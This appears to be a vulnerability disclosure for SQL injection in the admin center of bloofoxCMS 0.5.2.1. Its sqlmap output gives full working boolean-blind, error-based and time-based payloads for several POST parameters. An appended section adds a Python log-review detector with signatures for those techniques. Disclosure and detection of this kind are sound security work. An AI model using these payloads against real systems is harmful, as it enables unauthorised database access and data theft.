bloofoxCMS-0.5.2.1 has no security filtering of user input parameters in the admin center page, resulting in a large number of SQL injection vulnerabilities
in the parameters: eta_doctype, tmpl_id, urls, lang_id, meta_charset, mod_rewrite, default_group, meta_charset, page, default_group.
sqlmap identified the following injection point(s) with a total of 40629 HTTP(s) requests:
---
Parameter: tmpl_id (POST)
Type: boolean-based blind
Payload: name=123&lang_id=1&tmpl_id=1' RLIKE (SELECT (CASE WHEN (1317=1317) THEN 1 ELSE 0x28 END)) AND 'IGBu'='IGBu&urls=123123123&meta_title=123123&mod_rewrite=1&mail=123123@123.com&meta_copyright=13123&meta_desc=123123&meta_keywords=123123&meta_author=123123&meta_charset=#set($c=828095359+864788981)$&meta_doctype=XHTML 1.0 Transitional&default_group=1&send=Add Project
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: name=123&lang_id=1&tmpl_id=1' AND (SELECT 6808 FROM(SELECT COUNT(*),CONCAT(0x716b717871,(SELECT (ELT(6808=6808,1))),0x71716b7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'jPpX'='jPpX&urls=123123123&meta_title=123123&mod_rewrite=1&mail=123123@123.com&meta_copyright=13123&meta_desc=123123&meta_keywords=123123&meta_author=123123&meta_charset=#set($c=828095359+864788981)$&meta_doctype=XHTML 1.0 Transitional&default_group=1&send=Add Project
Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
Parameter: mod_rewrite (POST)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: name=123&lang_id=1&tmpl_id=1&urls=123123123&meta_title=123123&mod_rewrite=1' RLIKE (SELECT (CASE WHEN (3856=3856) THEN 1 ELSE 0x28 END)) AND 'dTgD'='dTgD&mail=123123@123.com&meta_copyright=13123&meta_desc=123123&meta_keywords=123123&meta_author=123123&meta_charset=#set($c=828095359+864788981)$&meta_doctype=XHTML 1.0 Transitional&default_group=1&send=Add Project
Vector: RLIKE (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 0x28 END))
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: name=123&lang_id=1' AND (SELECT 5000 FROM(SELECT COUNT(*),CONCAT(0x716b717871,(SELECT (ELT(5000=5000,1))),0x71716b7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'ebBO'='ebBO&tmpl_id=1&urls=123123123&meta_title=123123&mod_rewrite=1&mail=123123@123.com&meta_copyright=13123&meta_desc=123123&meta_keywords=123123&meta_author=123123&meta_charset=#set($c=828095359+864788981)$&meta_doctype=XHTML 1.0 Transitional&default_group=1&send=Add Project
Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: name=123&lang_id=1' AND (SELECT 5725 FROM (SELECT(SLEEP(5)))XuAL) AND 'WPHl'='WPHl&tmpl_id=1&urls=123123123&meta_title=123123&mod_rewrite=1&mail=123123@123.com&meta_copyright=13123&meta_desc=123123&meta_keywords=123123&meta_author=123123&meta_charset=#set($c=828095359+864788981)$&meta_doctype=XHTML 1.0 Transitional&default_group=1&send=Add Project
Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
Parameter: urls (POST)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: name=123&lang_id=1&tmpl_id=1&urls=123123123' RLIKE (SELECT (CASE WHEN (7865=7865) THEN 123123123 ELSE 0x28 END)) AND 'xTce'='xTce&meta_title=123123&mod_rewrite=1&mail=123123@123.com&meta_copyright=13123&meta_desc=123123&meta_keywords=123123&meta_author=123123&meta_charset=#set($c=828095359+864788981)$&meta_doctype=XHTML 1.0 Transitional&default_group=1&send=Add Project
Vector: RLIKE (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 0x28 END))
We can use sqlmap to validate:
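An added example (not part of the original report and not bloofoxCMS code): a log-review check over form-encoded POST bodies of the "Add Project" request that flags the three sqlmap techniques listed in the output above. The set of integer-only fields is an assumption (those fields carry the value 1 in the report's payloads), and the sample bodies are constructed by shortening payloads from the report.

```python
import re
from urllib.parse import parse_qs

# Assumption: these form fields are integer IDs/flags in the admin form.
INT_FIELDS = ("lang_id", "tmpl_id", "mod_rewrite", "default_group")

# One signature per technique named in the sqlmap output.
SIGNATURES = {
    "boolean-based blind": re.compile(
        r"\bRLIKE\s*\(\s*SELECT\s*\(\s*CASE\s+WHEN\b", re.I),
    "error-based": re.compile(
        r"\bFLOOR\s*\(\s*RAND\s*\(\s*0\s*\)\s*\*\s*2\s*\)", re.I),
    "time-based blind": re.compile(r"\bSLEEP\s*\(", re.I),
}

def inspect_body(body):
    """Return sorted (field, finding) pairs for one form-encoded POST body."""
    findings = set()
    for name, values in parse_qs(body, keep_blank_values=True).items():
        for value in values:
            # Type check first: it catches any injection into a numeric
            # field, whether or not a signature below matches.
            if name in INT_FIELDS and not re.fullmatch(r"\d{1,10}", value):
                findings.add((name, "non-integer value"))
            for technique, pattern in SIGNATURES.items():
                if pattern.search(value):
                    findings.add((name, technique))
    return sorted(findings)

# Constructed samples: shortened versions of payloads shown in the report.
SAMPLES = {
    "benign": "name=123&lang_id=1&tmpl_id=1&urls=123123123"
              "&mod_rewrite=1&default_group=1",
    "tmpl_id": "name=123&lang_id=1&tmpl_id=1' RLIKE (SELECT (CASE WHEN "
               "(1317=1317) THEN 1 ELSE 0x28 END)) AND 'IGBu'='IGBu"
               "&urls=123123123&mod_rewrite=1&default_group=1",
    "lang_id": "name=123&lang_id=1' AND (SELECT 5725 FROM "
               "(SELECT(SLEEP(5)))XuAL) AND 'WPHl'='WPHl"
               "&tmpl_id=1&mod_rewrite=1&default_group=1",
    "urls": "name=123&lang_id=1&tmpl_id=1&urls=123123123' RLIKE (SELECT "
            "(CASE WHEN (7865=7865) THEN 123123123 ELSE 0x28 END)) AND "
            "'xTce'='xTce&mod_rewrite=1&default_group=1",
}

if __name__ == "__main__":
    for label, body in SAMPLES.items():
        print(label, inspect_body(body))
```

The integer check is the part that carries over to the fix in the application itself: numeric fields should be validated as integers and all values bound through parameterized queries rather than concatenated into SQL.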